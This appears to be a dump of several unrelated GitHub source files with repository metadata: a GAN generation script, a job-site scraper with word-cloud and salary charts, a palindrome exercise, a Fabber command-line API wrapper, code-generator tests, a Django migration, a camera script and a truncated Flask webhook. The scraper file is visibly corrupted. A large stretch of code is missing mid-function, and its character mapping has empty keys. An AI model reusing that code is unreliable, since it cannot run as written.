= generated_img\n\t\tif idx == 32:\n\t\t\tsave_image(torchvision.utils.make_grid(grid_image), './generate_images/sample.png')\n\t# Display the generated image.\n\t\tsave_name = str(idx+1).zfill(4) + '.png'\n\t\tsave_image(generated_img, os.path.join(save_path, save_name))\n\ngenerated_image_data = GAN_data(save_path, 'test')\nIS, _ = inception_score(generated_image_data, cuda=True, resize=True)\nFID = FID_cal('../../hw2_data/face/test', save_path)\nprint('\\n FID:%.1f IS:%.2f' % (FID, IS))\n","repo_name":"come880412/DLCV2021_Fall","sub_path":"hw2/code/GAN/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14138926473","text":"import re\nimport csv\nimport requests\nimport jieba\nimport json\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.misc import imread\nfrom bs4 import BeautifulSoup\nfrom wordcloud import WordCloud, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n# 不发出警告\n\n\ndef get_one_page(cityid, keyword, pages):\n # 获取网页html内容并返回\n paras = {\n 'k': keyword,\n 'p': pages\n }\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36',\n 'Host': 'www.shixiseng.com',\n 'Referer': 'https://www.shixiseng.com/gz',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9'\n }\n\n url = 'https://www.shixiseng.com/interns/c-{}_?'.format(cityid)\n\n # 获取网页内容,返回html数据\n response = requests.get(url, headers=headers, params=paras)\n # 通过状态码判断是否获取成功\n if response.status_code == 200:\n return response.text\n return None\n\n\ndef get_mpage(response):\n mpage = re.findall('.*?p=(\\d+)\">尾页.*?',response)[0]\n return int(mpage)\n\n\ndef get_detail_pageinfo(response):\n hrefs = re.findall('.*?= 4:\n lst.append('violet')\n\n plt.axis('equal') # 保证长宽相等\n plt.pie(s['job'],\n labels=s.index,\n colors=lst,\n autopct='%.2f%%',\n pctdistance=0.5,\n labeldistance=0.8,\n startangle=0,\n radius=1.3)\n name = city + \"_\" + keyword + '_' + '学历分布饼图.png'\n plt.savefig(name, dpi=300)\n\n\ndef salary_hist(data, city, keyword):\n data['low_salary'] = data['salary'].str.strip('/天').str.split('-').str[0]\n data['high_salary'] = data['salary'].str.strip('/天').str.split('-').str[1]\n data['mean_salary'] = ( data['low_salary'].astype(np.int) + data['high_salary'].astype(np.int) ) / 2\n s = data['mean_salary']\n mean = s.mean()\n\n plt.figure(figsize=(8, 4)) # 设置作图大小\n plt.title('工资分布图') # 图名\n plt.xlabel('salary') # x轴标签\n sns.distplot(s, hist=False, kde=True, rug=True,\n rug_kws={'color': 'y', 'lw': 2, 'alpha': 0.5, 'height': 0.1}, # 设置数据频率分布颜色\n kde_kws={\"color\": \"y\", \"lw\": 1.5, 'linestyle': '--'}) # 设置密度曲线颜色,线宽,标注、线形\n\n plt.axvline(mean, color='g', linestyle=\":\", alpha=0.8)\n plt.text(mean + 2, 0.005, 'salary_mean: %.1f元' %mean, color='g')\n # 绘制平均工资辅助线\n\n name = city + \"_\" + keyword + '_' + '工资分布直方图.png'\n plt.savefig(name, dpi=300)\n\n\ndef main(city, keyword, pages):\n f_cityid = open('cityid_list.json','r', encoding ='utf8')\n data_id = f_cityid.read()\n data_id = json.loads(data_id)\n cityid = data_id[city]\n\n csv_filename = 'sxs' + city +'_' +keyword +'.csv'\n txt_filename = 'sxs' + city + '_' + keyword + '.txt'\n headers = ['job','salary','city','education','workday','worktime','job_good','job_detail',\n 'company_pic','company_name','company_scale','company_class']\n write_csv_headers(csv_filename, headers)\n n = 0\n\n response = get_one_page(cityid, keyword, 1)\n mpage = get_mpage(response)\n if pages >= mpage:\n pages = mpage\n\n for i in tqdm(range(pages)):\n # 获取该页中的所有职位信息,写入csv文件\n i = i + 1\n response = get_one_page(cityid, keyword, i)\n\n hrefs = get_detail_pageinfo(response)\n for href in hrefs:\n n += 1\n response_detail = get_detail_page(href)\n items = parse_detail_info(response_detail)\n\n pattern = re.compile(r'[一-龥]+') # 清除除文字外的所有字符\n data = re.findall(pattern, items['job_detail'])\n write_txt_file(txt_filename, ''.join(data)) # 不能直接写data,此时的data是列表格式\n write_csv_rows(csv_filename, headers, items)\n print('已录入 %d 条数据' % n)\n\n content = read_txt_file(txt_filename)\n segment = jieba.lcut(content)\n words_df = pd.DataFrame({'segment': segment})\n wordcloud(words_df, keyword, city)\n\n data_csv = read_scv(csv_filename)\n education_pie(data_csv, city, keyword)\n salary_hist(data_csv, city, keyword)\n\n\nif __name__ == '__main__':\n # 手动输入解密映射,需要时自助更新\n mapping = {'': '0', '': '1', '': '2', '': '3', '': '4',\n '': '5', '': '6', '': '7', '': '8', '': '9'}\n\n '''\n 注意:\n 1、main()参数输入\n 第一个参数 :工作城市(小城市搜索不到会报错,可查看 cityid_list 文档里可搜索的城市)\n 第二个参数 :岗位关键词\n 第三个参数 :爬取的岗位网页页数,一页有10个岗位信息\n 2、云图热词生图\n 可更换图片,注意图片名字不变\n 3、停止词\n 云图生成的热词经过‘stopwords’过滤掉不必要的词语,可按需要自助添加删减\n '''\n main('广州', '数据分析', 6)\n","repo_name":"BaiDong-QuQ/py-demo","sub_path":"shixiseng.py","file_name":"shixiseng.py","file_ext":"py","file_size_in_byte":10658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5987494852","text":"#팰린드롬수\n# while 1:\n# ck = False\n# numlist = list(input())\n# if len(numlist) == 1:\n# if numlist[0] == '0':\n# break\n# print(\"yes\")\n# else:\n# for i in range(0,len(numlist)//2):\n# if numlist[i] == numlist[len(numlist)-(i+1)]:\n# ck = True\n# else:\n# ck = False\n# print(\"no\")\n# break\n# if ck == True:\n# print(\"yes\")\n\n#다른 풀이\n#문자열 슬라이싱 [start:stop:step] = step부분이 음수이면 뒤집음\nwhile True:\n n = input()\n\n if n =='0':\n break\n if n == n[::-1]: #문자열을 뒤집음!\n print(\"yes\")\n else:\n print(\"no\")","repo_name":"seoyoung1215/AD-NeRF_sy_legacy","sub_path":"1259.py","file_name":"1259.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"265246087","text":"\"\"\"\nPYFAB API using Fabber command line tool(s)\n===========================================\n\nThis API uses Fabber command line tools, run within temporary\ndirectories, to implement the required functions. For short\nruns this is likely to be slower than the shared-library\nbased API however it can be used when the shared library is not\navailable or there are binary compatibility problems.\n\nNote that Fabber command line tools typically come as one\nper model library, i.e. ``fabber_asl`` which contains a number\nof ASL-MRI related models, ``fabber_cest`` which contains the\nCEST-MRI model, etc. The base ``fabber`` executable is not\nterribly useful in itself - it only includes generic linear\nand polynomial models.\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport collections\nimport tempfile\nimport subprocess\nimport shutil\nimport re\nimport os\nimport glob\nimport warnings\n\nimport six\nimport numpy as np\nimport nibabel as nib\n\nfrom fsl.utils.platform import platform as fslplatform\ntry:\n # Not all versions of fslpy support WSL and since this is not\n # compulsary to use pyfab we don't require it\n from fsl.utils.run import wslcmd\n FSLPY_HAVE_WSL=True\nexcept ImportError:\n FSLPY_HAVE_WSL=False\n\nfrom .api import FabberApi, FabberException, FabberRun\n\n# Maximum size allowed in Fabber logfile to avoid multiple errors\n# eating all the memory\nMAX_LOG_SIZE = 100000\n\ndef _progress_stdout_handler(progress_cb):\n \"\"\"\n :return: stdout handler which looks for percentage done reports\n and makes an appropriate call to the progress callback.\n\n The handler uses a regex to look for a 'percentage'\n output and calls the progress handler with the number\n found and a 'total' of 100.\n \"\"\"\n percent_re = re.compile(r\"^(\\d+)%?$\")\n def _handler(line):\n match = percent_re.match(line)\n if match:\n progress_cb(int(match.group(1)), 100)\n return _handler\n\nclass FabberClException(FabberException):\n \"\"\"\n Exception originating from the command line\n\n We try to read the logfile and also attempt to\n determine the message from the stdout\n \"\"\"\n def __init__(self, stdout=\"\", returncode=-1, outdir=None, log=\"\"):\n \"\"\"\n :param stdout: Standard output/error combined\n :param returncode: Return code from executable\n :param outdir: Output directory (to read logfile if possible)\n \"\"\"\n grabnext = False\n msg = \"\"\n for line in stdout.splitlines():\n if line == \"\":\n continue\n elif grabnext:\n msg = line.strip()\n grabnext = False\n elif \"exception\" in line.lower():\n grabnext = True\n log = log\n if outdir:\n logfile = os.path.join(outdir, \"logfile\")\n if os.path.exists(logfile):\n with open(logfile, \"r\") as logfile:\n log = logfile.read()\n\n FabberException.__init__(self, msg, returncode, log)\n\n # Required to make unpickling work\n # see https://stackoverflow.com/questions/41808912/cannot-unpickle-exception-subclass\n self.args = (stdout, returncode, None, log)\n\nclass FabberClRun(FabberRun):\n \"\"\"\n Run output from the command line API\n\n Sets the attributes log, timestamp, timestamp_str and data\n \"\"\"\n\n def __init__(self, outdir, options, extra_outputs, max_log_size=MAX_LOG_SIZE):\n \"\"\"\n :param outdir: Directory containing Fabber output\n \"\"\"\n with open(os.path.join(outdir, \"logfile\"), \"r\") as logfile:\n log = logfile.read(max_log_size)\n\n data = {}\n alphanum = \"[a-zA-Z0-9_]\"\n regexes = []\n nii = None\n\n if \"save-mean\" in options:\n regexes.append(re.compile(r\".*[/\\\\](mean_%s+)\\..+\" % alphanum))\n if \"save-std\" in options:\n regexes.append(re.compile(r\".*[/\\\\](std_%s+)\\..+\" % alphanum))\n if \"save-var\" in options:\n regexes.append(re.compile(r\".*[/\\\\](var_%s+)\\..+\" % alphanum))\n if \"save-zstat\" in options:\n regexes.append(re.compile(r\".*[/\\\\](zstat_%s+)\\..+\" % alphanum))\n if \"save-noise-mean\" in options:\n regexes.append(re.compile(r\".*[/\\\\](noise_means)\\..+\"))\n if \"save-noise-std\" in options:\n regexes.append(re.compile(r\".*[/\\\\](noise_stdevs)\\..+\"))\n if \"save-free-energy\" in options:\n regexes.append(re.compile(r\".*[/\\\\](freeEnergy)\\..+\"))\n regexes.append(re.compile(r\".*[/\\\\](freeEnergyHistory)\\..+\"))\n if \"save-mvn\" in options:\n regexes.append(re.compile(r\".*[/\\\\](finalMVN)\\..+\"))\n if \"save-model-fit\" in options:\n regexes.append(re.compile(r\".*[/\\\\](modelfit)\\..+\"))\n if \"save-residuals\" in options:\n regexes.append(re.compile(r\".*[/\\\\](residuals)\\..+\"))\n for output in extra_outputs:\n regexes.append(re.compile(r\".*[/\\\\](%s)\\..+\" % output))\n\n for fname in glob.glob(os.path.join(outdir, \"*\")):\n for regex in regexes:\n match = regex.match(fname)\n if match:\n nii = nib.load(fname)\n data[match.group(1)] = np.array(nii.get_fdata())\n\n FabberRun.__init__(self, data, log)\n\n # Assuming we managed to load some data at some point, use the NII header\n # as the reference for future saving of the data to an output directory\n if nii is not None:\n self.nii_header = nii.header.copy()\n\nclass FabberCl(FabberApi):\n \"\"\"\n Interface to Fabber using command line\n \"\"\"\n\n def __init__(self, core_exe=None, model_exes=None, **kwargs):\n FabberApi.__init__(self, core_exe=core_exe, model_exes=model_exes, **kwargs)\n\n if core_exe is not None and not os.path.isfile(self.core_exe):\n raise FabberException(\"Invalid core executable - file not found: %s\" % self.core_exe)\n\n self._model_groups = None\n self._models = None\n\n def get_methods(self):\n stdout = self._call(listmethods=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def get_models(self, model_group=None):\n if self._model_groups is None:\n self._model_groups = {}\n self._models = {}\n for group in self.model_exes:\n group = group.lower()\n stdout = self._call(listmodels=True, model_group=group)\n self._models[group] = [line for line in stdout.splitlines() if line.strip()]\n for model in self._models[group]:\n self._model_groups[model] = group\n if model_group is not None:\n return self._models.get(model_group.lower(), [])\n else:\n return list(self._model_groups.keys())\n\n def get_options(self, generic=None, method=None, model=None):\n if generic is None:\n # For backwards compatibility - no params = generic\n generic = not method and not model\n\n ret, all_lines = [], []\n if method:\n stdout = self._call(help=True, method=method)\n lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n if model:\n stdout = self._call(help=True, model=model)\n lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n if generic:\n stdout = self._call(help=True)\n lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n\n opts = self._parse_options(all_lines)\n ret.insert(0, opts)\n return tuple(ret)\n\n def get_model_params(self, options):\n stdout = self._call(options, listparams=True, data_options=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def get_model_param_descs(self, options):\n stdout = self._call(options, descparams=True, data_options=True)\n return self._parse_params(stdout.splitlines())\n\n def get_model_outputs(self, options):\n stdout = self._call(options, listoutputs=True, data_options=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def model_evaluate(self, options, param_values, nvols, indata=None, output_name=\"\"):\n params = self.get_model_params(options)\n plist = []\n for param in params:\n if param not in param_values:\n raise FabberException(\"Model parameter %s not specified\" % param)\n else:\n plist.append(param_values[param])\n\n if len(param_values) != len(params):\n raise FabberException(\"Incorrect number of parameters: expected %i (%s)\" % (len(params), \",\".join(params)))\n\n params_file = self._write_temp_matrix(plist)\n data_file = None\n if indata is not None:\n data_file = self._write_temp_matrix(indata)\n\n stdout = self._call(options, evaluate=output_name, evaluate_nt=nvols,\n evaluate_params=params_file, evaluate_data=data_file, data_options=True)\n ret = []\n for line in [line for line in stdout.splitlines() if line.strip()]:\n try:\n ret.append(float(line))\n except ValueError:\n warnings.warn(\"Unexpected output: %s\" % line)\n return ret\n\n def run(self, options, progress_cb=None, **kwargs):\n if \"data\" not in options:\n raise ValueError(\"Main voxel data not provided\")\n\n max_log_size = kwargs.pop(\"max_log_size\", MAX_LOG_SIZE)\n if progress_cb is not None:\n stdout_handler = _progress_stdout_handler(progress_cb)\n else:\n stdout_handler = None\n\n outdir = None\n try:\n outdir = tempfile.mkdtemp(\"fabberout\")\n out_subdir = os.path.join(outdir, \"fabout\")\n extra_outputs = self.get_model_outputs(options)\n self._call(options, output=out_subdir, stdout_handler=stdout_handler, simple_output=True, data_options=True)\n return FabberClRun(out_subdir, self._normalize_options(options), extra_outputs, max_log_size)\n finally:\n if outdir is not None:\n shutil.rmtree(outdir)\n\n def _parse_options(self, lines):\n \"\"\"\n Parse option specifiers like:\n\n --save-mean [BOOL,NOT REQUIRED,NO DEFAULT]\n Output the parameter means.\n \"\"\"\n options = []\n current_option = {}\n option_regex = re.compile(r'--(.+)\\s\\[(.+),(.+),(.+)]')\n for line in lines:\n match = option_regex.match(line)\n if match:\n if current_option:\n current_option[\"description\"] = current_option[\"description\"][:-1]\n\n current_option = {\n \"name\" : match.group(1),\n \"type\" : match.group(2),\n \"optional\" : match.group(3) == 'NOT REQUIRED',\n \"default\" : match.group(4),\n \"description\" : \"\"\n }\n if current_option[\"default\"] == \"NO DEFAULT\":\n current_option[\"default\"] = \"\"\n else:\n current_option[\"default\"] = current_option[\"default\"].split(\"=\", 1)[1]\n\n options.append(current_option)\n elif current_option:\n desc = line.strip()\n if desc:\n current_option[\"description\"] += desc + \" \"\n\n return options\n\n def _call(self, options=None, stdout_handler=None, data_options=False, **kwargs):\n \"\"\"\n Call the Fabber executable\n \"\"\"\n indir = None\n try:\n if options is None:\n options = {}\n else:\n options = dict(options)\n options.update(kwargs)\n\n # Convert options to format expected by Fabber (e.g. _ -> -)\n options = self._normalize_options(options)\n\n # If required, write data options to temporary files\n if data_options:\n indir, options = self._process_data_options(options)\n\n # Get the correct executable for the model/model group required\n exe = self._get_exe(options)\n\n # Convert options to command line arguments\n cl_args = self._get_clargs(options)\n\n startupinfo=None\n if FSLPY_HAVE_WSL:\n if fslplatform.fslwsl:\n cl_args.insert(0, \"fabber\")\n cmdargs = wslcmd(exe, *cl_args)\n exe, cl_args = cmdargs[0], cmdargs[1:]\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n # Run the process and return stdout\n stdout = six.StringIO()\n process = subprocess.Popen([exe] + cl_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=startupinfo)\n while 1:\n retcode = process.poll() # returns None while subprocess is running\n line = process.stdout.readline().decode('utf-8')\n stdout.write(line)\n stdout.write(\"\\n\")\n if stdout_handler is not None:\n stdout_handler(line)\n if line == \"\" and retcode is not None:\n break\n\n if retcode != 0:\n errmsg = stdout.getvalue()\n if self._debug:\n errmsg = exe + \" \" + \" \".join(cl_args) + \"\\n\" + errmsg\n raise FabberClException(errmsg, retcode, options.get(\"output\", \"\"))\n return stdout.getvalue()\n finally:\n if indir is not None:\n shutil.rmtree(indir)\n\n def _get_exe(self, options):\n \"\"\"\n Get the right Fabber exe to use\n \"\"\"\n if \"model_group\" in options or \"model-group\" in options:\n group = options.pop(\"model_group\", options.pop(\"model-group\", \"\")).lower()\n if group not in self.model_exes:\n raise ValueError(\"Unknown model group: %s\" % group)\n exe = self.model_exes[group]\n elif \"model\" in options:\n self.get_models()\n model = options[\"model\"]\n if model not in self._model_groups:\n raise ValueError(\"Unknown model: %s\" % model)\n exe = self.model_exes[self._model_groups[model]]\n elif self.core_exe is not None:\n exe = self.core_exe\n elif self._model_groups:\n exe = self.model_exes.values()[0]\n else:\n raise ValueError(\"No Fabber executable found\")\n return exe\n\n def _process_data_options(self, options):\n \"\"\"\n Identify options which need to be written to temporary files before Fabber\n can use them\n\n :return: Tuple of temp directory name, new options dict\n \"\"\"\n indir = tempfile.mkdtemp(\"fabberin\")\n try:\n options = dict(options)\n model_options = self.get_options(model=options.get(\"model\", None),\n method=options.get(\"method\", None),\n generic=True)[0]\n for key in list(options.keys()):\n if self.is_data_option(key, model_options):\n # Allow input data to be given as Numpy array, Nifti image or filename. It\n # must be passed to Fabber as a file name\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, six.string_types):\n options[key] = value\n elif isinstance(value, (int, float)):\n # Work around bug in some versions of fabber where some numeric options\n # are miscategorized as data options\n options[key] = str(value)\n elif isinstance(value, nib.Nifti1Image):\n options[key] = self._write_temp_nifti(value, indir)\n elif isinstance(value, np.ndarray):\n nii = nib.Nifti1Image(value, affine=np.identity(4))\n options[key] = self._write_temp_nifti(nii, indir)\n else:\n raise ValueError(\"Unsupported type for input data: %s = %s\" % (key, type(value)))\n\n elif self.is_matrix_option(key, model_options):\n # Input matrices can be given as Numpy arrays or sequences but must be\n # passed to fabber as file names\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, six.string_types):\n options[key] = value\n elif isinstance(value, (int, float)):\n # Work around bug in some versions of fabber where some numeric options\n # are miscategorized as matrix options\n options[key] = str(value)\n elif isinstance(value, (np.ndarray, collections.Sequence)):\n options[key] = self._write_temp_matrix(value, indir)\n elif isinstance(value, (int, float)):\n # Work around fabber_core bug where evaluate-nt is defined as a matrix\n options[key] = value\n else:\n raise ValueError(\"Unsupported type for input matrix: %s = %s\" % (key, type(value)))\n\n elif self.is_sequence_option(key, model_options):\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, (list, tuple)):\n for idx, val in enumerate(value):\n options[\"%s%i\" % (key, idx+1)] = val\n else:\n options[key] = value\n\n return indir, options\n except:\n shutil.rmtree(indir)\n raise\n\n def _get_clargs(self, options):\n \"\"\"\n Build command line arguments from options\n \"\"\"\n cl_args = []\n for key, value in options.items():\n if key:\n if value != \"\":\n cl_args.append(\"--%s=%s\" % (key, value))\n else:\n cl_args.append(\"--%s\" % key)\n\n return cl_args\n","repo_name":"physimals/pyfab","sub_path":"fabber/api_cl.py","file_name":"api_cl.py","file_ext":"py","file_size_in_byte":18713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34444717019","text":"from danger_python.generator.models import (\n ClassDefinition,\n EnumDefinition,\n PropertyDefinition,\n)\nfrom danger_python.generator.renderer import render_classes\n\n\ndef test_renderer_renders_definitions_correctly():\n \"\"\"\n Test that renderer renders definitions correctly.\n \"\"\"\n to_render = [\n EnumDefinition(\n name=\"SomeNiceEnum\",\n depends_on=set(),\n values=[(\"FIRST_VALUE\", \"first_value\"), (\"SECOND_VALUE\", \"second_value\")],\n ),\n ClassDefinition(\n name=\"APythonClass\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"string_val\",\n key=\"stringVal\",\n value_type=\"str\",\n known_type=True,\n ),\n PropertyDefinition(\n name=\"int_val\", key=\"intVal\", value_type=\"int\", known_type=True\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class SomeNiceEnum(Enum):\\n\"\n ' FIRST_VALUE = \"first_value\"\\n'\n ' SECOND_VALUE = \"second_value\"\\n'\n \"\\n\"\n \"\\n\"\n \"class APythonClass(BaseModel):\\n\"\n \" string_val: Optional[str]\\n\"\n \" int_val: Optional[int]\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"string_val\": \"stringVal\",\\n'\n ' \"int_val\": \"intVal\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"APythonClass.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_handles_empty_classes_and_enums():\n \"\"\"\n Test renderer handles empty classes and enums.\n \"\"\"\n to_render = [\n EnumDefinition(name=\"EmptyEnum\", depends_on=set(), values=[]),\n ClassDefinition(name=\"EmptyClass\", depends_on=set(), properties=[]),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class EmptyEnum(Enum):\\n\"\n \" pass\\n\"\n \"\\n\"\n \"\\n\"\n \"class EmptyClass(BaseModel):\\n\"\n \" pass\\n\"\n \"\\n\"\n \"\\n\"\n \"EmptyClass.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_renders_custom_attributes_correctly():\n \"\"\"\n Test that renderer renders definitions correctly.\n \"\"\"\n to_render = [\n ClassDefinition(\n name=\"ClassWithUnknownTypes\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"first_prop\",\n key=\"firstProp\",\n value_type=\"FirstUnknownType\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"second_prop\",\n key=\"secondProp\",\n value_type=\"List[SecondUnknownType]\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"third_prop\",\n key=\"thirdProp\",\n value_type=\"Optional[ThirdUnknownType]\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"any_prop\", key=\"anyProp\", value_type=\"Any\", known_type=True\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class ClassWithUnknownTypes(BaseModel):\\n\"\n ' first_prop: Optional[\"FirstUnknownType\"]\\n'\n ' second_prop: Optional[List[\"SecondUnknownType\"]]\\n'\n ' third_prop: Optional[\"ThirdUnknownType\"]\\n'\n \" any_prop: Any\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"first_prop\": \"firstProp\",\\n'\n ' \"second_prop\": \"secondProp\",\\n'\n ' \"third_prop\": \"thirdProp\",\\n'\n ' \"any_prop\": \"anyProp\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"ClassWithUnknownTypes.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_aliases_properties():\n \"\"\"\n Test that renderer aliases properties.\n \"\"\"\n to_render = [\n ClassDefinition(\n name=\"ClassWithAliases\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"self\", key=\"self\", value_type=\"str\", known_type=True\n ),\n PropertyDefinition(\n name=\"from\", key=\"from\", value_type=\"int\", known_type=True\n ),\n PropertyDefinition(\n name=\"non_aliased\",\n key=\"nonAliased\",\n value_type=\"Optional[str]\",\n known_type=True,\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class ClassWithAliases(BaseModel):\\n\"\n \" self_: Optional[str]\\n\"\n \" from_: Optional[int]\\n\"\n \" non_aliased: Optional[str]\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"self_\": \"self\",\\n'\n ' \"from_\": \"from\",\\n'\n ' \"non_aliased\": \"nonAliased\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"ClassWithAliases.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n","repo_name":"danger/python","sub_path":"tests/generator/test_renderer.py","file_name":"test_renderer.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"44870333822","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Camp',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('security', models.CharField(max_length=3, verbose_name='Bezpiecze\\u0144stwo obozu', choices=[(b'-3', '-3 - ob\\xf3z na dnie w\\u0105wozu'), (b'-2', '-2'), (b'-1', '-1'), (b'0', '0 - polana w lesie'), (b'1', '1'), (b'2', '2'), (b'3', '3 - opuszczona fortyfikacja na wzniesieniu')])),\n ('visibility', models.IntegerField(verbose_name='Widoczno\\u015b\\u0107 obozu', validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(1)])),\n ('amount_of_water_stored', models.DecimalField(verbose_name='Jednostki zebranej wody', max_digits=4, decimal_places=1)),\n ('amount_of_food_stored', models.DecimalField(verbose_name='Jednostki zebranego jedzenia', max_digits=4, decimal_places=1)),\n ('has_food_utensils', models.BooleanField(default=False, verbose_name='Utensylia do gotowania')),\n ('has_clean_clothes', models.BooleanField(default=False, verbose_name='Czyste ubrania')),\n ('has_real_beds', models.BooleanField(default=False, verbose_name='\\u0141\\xf3\\u017cka')),\n ('has_storage', models.BooleanField(default=False, verbose_name='Przestrze\\u0144 magazynowa')),\n ],\n options={\n 'verbose_name': 'Ob\\xf3z',\n 'verbose_name_plural': 'Obozy',\n },\n ),\n migrations.CreateModel(\n name='Camper',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='Imi\\u0119')),\n ('amount_of_water_needed', models.DecimalField(default=4, verbose_name='Jednostki dziennie zu\\u017cytej wody', max_digits=4, decimal_places=1)),\n ('amount_of_food_needed', models.DecimalField(default=1, verbose_name='Jednostki dziennie zu\\u017cytego jedzenia', max_digits=4, decimal_places=1)),\n ],\n options={\n 'verbose_name': 'Obozowicz',\n 'verbose_name_plural': 'Obozowicze',\n },\n ),\n migrations.AddField(\n model_name='camp',\n name='campers',\n field=models.ManyToManyField(to='camping.Camper'),\n ),\n ]\n","repo_name":"niktto/dontstarve_camp_status","sub_path":"camping/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10342881985","text":"from picamera import PiCamera\nimport time\n\n\ncamera = PiCamera()\ntime.sleep(2)\n\nfor i in range(10):\n\ttime1 = time.time()\n\tcamera.capture('/home/pi/raspicam/image.jpg')\n\ttime2 = time.time()\n\tprint((time2-time1)*1000)\n\nprint(camera.framerate)\nprint(camera.shutter_speed )","repo_name":"Robot-Sumo/SumoPontifice-Raspberry","sub_path":"raspicam/picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13730086945","text":"#!/usr/bin/env python\n\nimport json\nimport os\nimport requests\nfrom flask import Flask\nfrom flask import request\n\napp = Flask(__name__)\n\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n req = request.get_json(silent=True, force=True)\n message = req.get(\"result\").get(\"fulfillment\").get(\"messages\")[0][\"speech\"]\n responseMessage = json.dumps({\n \"speech\": message,\n \"displayText\": message,\n \"messages\": {\n \"type\": 1,\n \"title\": \"card title\",\n \"subtitle\": \"card text\",\n \"imageUrl\": \"https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png\"\n },\n \"data\": {\n \"google\": {\n \"expectUserResponse\": True,\n \"richResponse\": {\n \"items\": [\n {\n \"simpleResponse\": {\n \"textToSpeech\": message\n }\n }\n ]\n }\n },\n \"facebook\": {\n \"text\": message\n },\n \"slack\": {\n \"text\": message\n }\n },\n \"contextOut\": [],\n \"source\": \"example.com\",\n \"followupEvent\": {}\n })\n if req.get(\"result\").get(\"action\") == 